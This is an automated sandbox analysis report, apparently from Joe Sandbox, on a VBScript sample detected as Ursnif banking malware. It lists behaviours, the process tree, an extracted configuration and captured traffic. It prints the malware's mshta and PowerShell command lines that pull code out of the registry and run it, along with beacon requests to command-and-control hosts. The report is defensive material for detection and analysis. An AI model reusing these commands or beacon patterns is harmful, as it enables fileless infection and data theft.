
Analysis Report PtgzM1Gd04Up.vbs

Overview

General Information

Sample Name: PtgzM1Gd04Up.vbs
Analysis ID: 284873
MD5: 0671e735481a55031081895bf0f57760
SHA1: 11788132e8b10e6370530d68d2d562737ef1dae0
SHA256: f9ad25e0810fc3f545213be438f531677595044c6a64d6b367e93b9aad9910e6

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Creates a thread in another existing process (thread injection)
Creates processes via WMI
Deletes itself after installation
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file access)
Uses nslookup.exe to query domains
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 4256 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\PtgzM1Gd04Up.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 4976 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4116 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4976 CREDAT:9474 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 4324 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4976 CREDAT:4068644 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 3820 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4976 CREDAT:9484 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 3064 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4976 CREDAT:75036 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 1308 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5540 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 1572 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cwptyz3z.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 420 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCAFE.tmp' 'c:\Users\user\AppData\Local\Temp\CSCD3EB2606A30F49E59B9A84403A1A868D.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5832 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\z00zcx10.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5764 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD743.tmp' 'c:\Users\user\AppData\Local\Temp\CSC711CCB0208342BE82936D1DDCB3B6.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3508 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 2288 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\90E6.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • nslookup.exe (PID: 5796 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
        • cmd.exe (PID: 244 cmdline: cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\90E6.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • control.exe (PID: 632 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • rundll32.exe (PID: 5436 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "ip": "84.17.52.10", "version": "250155", "uptime": "275", "system": "b3683a3d0e66b42e1ff2a9f4849c6b42", "crc": "434b8", "action": "00000001", "id": "1100", "time": "1600071833", "user": "f73be0088695dc15e71ab15c4c34f37a", "soft": "1"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
0000001E.00000003.563919283.000001C3E6640000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000004.00000003.491933898.0000000005A98000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000004.00000003.555836306.0000000004C60000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
0000001F.00000002.627702451.000001E98B13E000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000004.00000003.491904248.0000000005A98000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
(5 of 21 entries shown)

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location
  Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cwptyz3z.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cwptyz3z.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5540, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cwptyz3z.cmdline', ProcessId: 1572
Sigma detected: MSHTA Spawning Windows Shell
  Source: Process started | Author: Michael Haag | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1308, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 5540
Sigma detected: Suspicious Csc.exe Source File Folder
  Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cwptyz3z.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cwptyz3z.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5540, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cwptyz3z.cmdline', ProcessId: 1572
Sigma detected: Suspicious Rundll32 Activity
  Source: Process started | Author: juju4 | Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 632, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 5436

Signature Overview

AV Detection:

Antivirus detection for dropped file
  Source: C:\Users\user\AppData\Local\Temp\ogress.psd | Avira: detection malicious, Label: TR/Kryptik.fklcr
Found malware configuration
  Source: explorer.exe.3508.29.memstr | Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "ip": "84.17.52.10", "version": "250155", "uptime": "275", "system": "b3683a3d0e66b42e1ff2a9f4849c6b42", "crc": "434b8", "action": "00000001", "id": "1100", "time": "1600071833", "user": "f73be0088695dc15e71ab15c4c34f37a", "soft": "1"}
Multi AV Scanner detection for domain / URL
  Source: api3.lepini.at | Virustotal: Detection: 6%
  Source: api10.laptok.at | Virustotal: Detection: 8%
Multi AV Scanner detection for dropped file
  Source: C:\Users\user\AppData\Local\Temp\ogress.psd | Virustotal: Detection: 7%
  Source: C:\Users\user\AppData\Local\Temp\ogress.psd | ReversingLabs: Detection: 25%
Multi AV Scanner detection for submitted file
  Source: PtgzM1Gd04Up.vbs | Virustotal: Detection: 19%
  Source: C:\Windows\explorer.exe | Code function: 29_2_04D0FD7C FindFirstFileW,FindFirstFileW,29_2_04D0FD7C
  Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
  Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
  Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
  Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
  Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
  Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local

Networking:

Found Tor onion address
  Source: explorer.exe, 0000001D.00000002.637761325.0000000004D1E000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
  Source: control.exe, 0000001E.00000003.563919283.000001C3E6640000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
  Source: RuntimeBroker.exe, 0000001F.00000002.627702451.000001E98B13E000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
  Source: rundll32.exe, 00000020.00000002.580157603.000001B5767DE000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
  Source: RuntimeBroker.exe, 00000022.00000002.625989422.000001357695E000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
  Source: RuntimeBroker.exe, 00000025.00000002.627966819.00000257BF38E000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Uses nslookup.exe to query domains
  Source: unknown | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
  Source: Joe Sandbox View | ASN Name: CNNIC-ALIBABA-US-NET-AP AlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-AP AlibabaUSTechnologyCoLtdC
  Source: global traffic | HTTP traffic detected:
    GET /api1/4cWzoWXzIMudPPFeH/zfwY1OFNMk6A/uxIsOO9XowW/7kFoCfkfah_2BV/bjG0FzF8tkMfsfO9WibRs/z5SQzweKlMCW_2Bf/r3FHVUdIQ7_2B2F/4OggET4YVDlHnn9cEt/R_2FbmgPY/r_2B9Ijs2bxGBYWN157X/EHLvOSxdZEysAMq3hvU/MO7ssYO3b9BR2qwc73_2BM/qSiRGq20QKCka/MMWlF28y/KLXW_2BJT56aQAQ7YU8EjqN/2JsZzAR8j1/xbv8cnzdbfuDeI002/Z_0A_0Du4aCB/iVnAW6cFBzY/T9beXtW5wNqhrT/3IUVp4YjtpqX/o44VY HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: api10.laptok.at
    Connection: Keep-Alive
  Source: global traffic | HTTP traffic detected:
    GET /favicon.ico HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: api10.laptok.at
    Connection: Keep-Alive
  Source: global traffic | HTTP traffic detected:
    GET /api1/ZrPM67eDMe0PJ3bd_2/FxYQ81wrj/FZQ351HtZv0VYLflOyX0/44ew0J0pAyJ2Zdt06J1/ejOutO4MWBnDs5A4maeYdF/TBoJIgwOCHRt8/zoJ_2FqC/ObYSEQUT98biFMg2p_2FLGO/Xe2sFFEt_2/BXVMVxynFtgTL14VJ/FomSQ9vCfuSu/ZDzzaPIbP4h/UGxi94rwNTQaqm/5H4Z_2BzYq0JgTNSAUiFj/AI1qd5OmqqcNF1YR/Y9f6ejd6eQItj7o/6e_2BlTQlKCx6vht_0/A_0D_2FkX/2mc9WbUuipCdNpIesLm7/AmJocubwsIxSN8THOau/P2krAXI1XX1cFN9bNtH7jO/c5jZ HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: api10.laptok.at
    Connection: Keep-Alive
  Source: global traffic | HTTP traffic detected:
    GET /favicon.ico HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: api10.laptok.at
    Connection: Keep-Alive
  Source: global traffic | HTTP traffic detected:
    GET /api1/udPukZ9VjF4q9dYkKyR/FKWIM0ktsVkJHkieBAN318/9svVgQXxMnZKC/C3qjdQsT/xXyOPBhUkWhjObIGcRm4pOg/X2ghSrkPNJ/BFV3PYkVSqynhIZX0/z8cw3abh6ejc/qRsdswbWqP7/MozmpHSBnTRSly/muxskxDd4VCkj_2FZq9_2/FrmSrVCRtfsyaBuq/3Rbvb2aOOviCSur/3TAMqR4wgwK79P_2BX/um60KPfM1/n1uToq7rUKSO_2FCOBeY/jezBVFJCh_2FrZ_0A_0/DMhAHfv9uMKeCVVA7pZkld/wK9Z7iNRykPb1/EH4FQici/0vYDr4GEFcCM3JZanZOshh9/HY1 HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: api10.laptok.at
    Connection: Keep-Alive
  Source: global traffic | HTTP traffic detected:
    GET /api1/8C7l82RZD/IPNx_2BA6NUS8m1Meo_2/Fas2lkcyOv4_2FyXQQA/W0ZQwXgbdYzfWai3c5CkbI/em5fguyn1S8ys/vpVw9dvD/khZPTWdEQCV0N5AR0qa1YOQ/LvEPSTN_2F/zlA2gt8ynYhIMOHfr/IASIpnbuTOlg/DdcZGi8WPYI/NR3mJxPuW34_2F/az5LW_2FJU_2BFw_2FsqB/vWjp2JDa_2Fg14a2/OTYnqh9mlzVPBkV/fSy7aPAm0_2BP4YyPN/c8k0VMTpv/7Lv8jSScGYAfEur_0A_0/DYV_2Fv17qFzbgLKlQu/3u2R7Gz5WRVQ7nkvK55OrO/9i9B3_2BMh/r HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
    Host: api3.lepini.at
  Source: global traffic | HTTP traffic detected:
    GET /api1/n3L9lcGQWucW/ej8OoZYqYIS/qXKKw05yNY8m6C/sIwmpsT57_2BC61WFCPNP/yRuWmkpJOA5akf0b/bNLsbtLqpQ29JXE/GP5k1v91FymLa5DQtI/OCDbHUhQZ/fcbJOzIIFU9rJvmqoBnO/w0gRKfdB79tXuhFoLvP/d2sQ3SKwyUaMPAHzUDn1AD/_2FGn_2Bm3otg/2r86MlCl/Hj4_2F2OwjgRkb0nTVl3z6Q/0WYrmJnvEh/4MpDHwU2mFKd8OikK/_2BbtrY5iV9f/mS_0A_0Dmze/1NUYbLxCWeOqq3/MzK7cHLvfsovO5hnqCChW/oWreT_2B/ViD HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
    Host: api3.lepini.at
  Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
  Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
  Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
  Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
  Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
  Source: msapplication.xml1.13.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x5798282a,0x01d68a70</date><accdate>0x5798282a,0x01d68a70</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
  Source: msapplication.xml1.13.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x5798282a,0x01d68a70</date><accdate>0x5798282a,0x01d68a70</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
  Source: msapplication.xml6.13.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x579c9ee9,0x01d68a70</date><accdate>0x579c9ee9,0x01d68a70</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
  Source: msapplication.xml6.13.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x579c9ee9,0x01d68a70</date><accdate>0x579d62c9,0x01d68a70</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
  Source: msapplication.xml8.13.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x579e3bd2,0x01d68a70</date><accdate>0x579e3bd2,0x01d68a70</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
  Source: msapplication.xml8.13.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x579e3bd2,0x01d68a70</date><accdate>0x579ec4f1,0x01d68a70</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
  Source: unknown | DNS traffic detected: queries for: api10.laptok.at
  Source: unknown | HTTP traffic detected:
